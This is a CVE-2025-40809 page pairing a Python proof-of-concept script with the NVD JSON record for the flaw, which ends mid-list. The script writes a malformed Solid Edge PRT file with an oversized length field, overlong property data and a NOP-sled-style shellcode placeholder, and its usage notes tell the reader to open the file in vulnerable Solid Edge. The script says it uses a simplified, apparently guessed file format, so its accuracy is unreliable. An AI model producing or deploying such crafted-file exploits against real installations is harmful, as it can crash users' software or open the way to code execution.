CVE-2025-40809

# CVE-2025-40809 PoC - Solid Edge PRT File Out-of-Bounds Write # This PoC demonstrates a malformed PRT file that triggers an out-of-bounds write # vulnerability in Solid Edge SE2024 (< V224.0 Update 14) and SE2025 (< V225.0 Update 6) # # WARNING: This is for educational/research purposes only. Do not use maliciously. import struct import sys def generate_malicious_prt(filename): """ Generate a malicious PRT file that triggers out-of-bounds write during Solid Edge's PRT file parsing. """ # PRT file header (simplified Solid Edge PRT format) header = b'\x00' * 16 # File header magic bytes # Section 1: File metadata with corrupted length field # Normal section header: 4-byte tag + 4-byte length section1_tag = b'META' # Intentionally oversized length value to trigger OOB write section1_length = struct.pack('<I', 0xFFFFFF00) # Overly large length section1_data = b'\x41' * 64 # Section data payload # Section 2: Geometry data with malformed offset section2_tag = b'GEOM' section2_length = struct.pack('<I', 128) # Corrupted vertex/normal data with out-of-bounds indices section2_data = struct.pack('<III', 0xDEADBEEF, 0x41414141, 0xCAFEBABE) section2_data += b'\x90' * 112 # NOP sled-like pattern (shellcode placeholder) # Section 3: Property block with buffer overflow trigger section3_tag = b'PROP' section3_length = struct.pack('<I', 32) # Crafted property values that exceed expected buffer section3_data = b'\x42' * 256 # Exceeds declared length to trigger OOB write # Assemble malicious PRT file payload = header payload += section1_tag + section1_length + section1_data payload += section2_tag + section2_length + section2_data payload += section3_tag + section3_length + section3_data # Add trailer payload += b'\x00' * 32 with open(filename, 'wb') as f: f.write(payload) print(f"[+] Malicious PRT file generated: {filename}") print(f"[+] File size: {len(payload)} bytes") print(f"[!] Open this file with vulnerable Solid Edge to trigger CVE-2025-40809") if __name__ == '__main__': output_file = sys.argv[1] if len(sys.argv) > 1 else 'exploit.prt' generate_malicious_prt(output_file) # Usage: # python3 poc.py malicious.prt # Then open malicious.prt in vulnerable Solid Edge SE2024/SE2025

{"cve": {"id": "CVE-2025-40809", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:39.580", "lastModified": "2025-10-16T14:03:17.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds write vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:*", "matchCriteriaId": "893736B3-0140-4775-8700-CB9D7719DDE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:*", "matchCriteriaId": "A0119E8F-1FAF-4A3B-B6E9-20F78360FC82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:*", "matchCriteriaId": "829C4AEB-7C8D-408B-A79C-8684753F45E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:*", "matchCriteriaId": "8E262AB3-8C47-430A-9D42-89317CB630C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:*", "matchCriteriaId": "94758C94-F427-480E-A9F1-109D8660C4E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00012:*:*:*:*:*:*", "matchCriteriaId": "D084D11C-08FB-4EEE-A5E3-D93C10103D2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00013:*:*:*:*:*:*", "matchCriteriaId": "F8A834C5-1E45-4087-A3A4-C059A2C9960C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0002:*:*:*:*:*:*", "matchCriteriaId": "1E8FB23E-280D-46FD-BD44-5D4552639E00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0003:*:*:*:*:*:*", "matchCriteriaId": "CA2417A0-DD31-46FC-8D5A-9128B86C9352"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0004:*:*:*:*:*:*", "matchCriteriaId": "3CA9C494-767C-4CFA-AB07-106298B7B2C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0005:*:*:*:*:*:*", "matchCriteriaId": "C3738D73-82A5-41E4-8083-34611A6301BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0006:*:*:*:*:*:*", "matchCriteriaId": "5634352F-0DD1-4731-9E43-61D0A9A40D1B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0007:*:*:*:*:*:*", "matchCriteriaId": "32E3D549-54F0-4909-830D-BDE8CDAD5AF7"}, {"vulnerable": true, "criteria": "cp ... (truncated)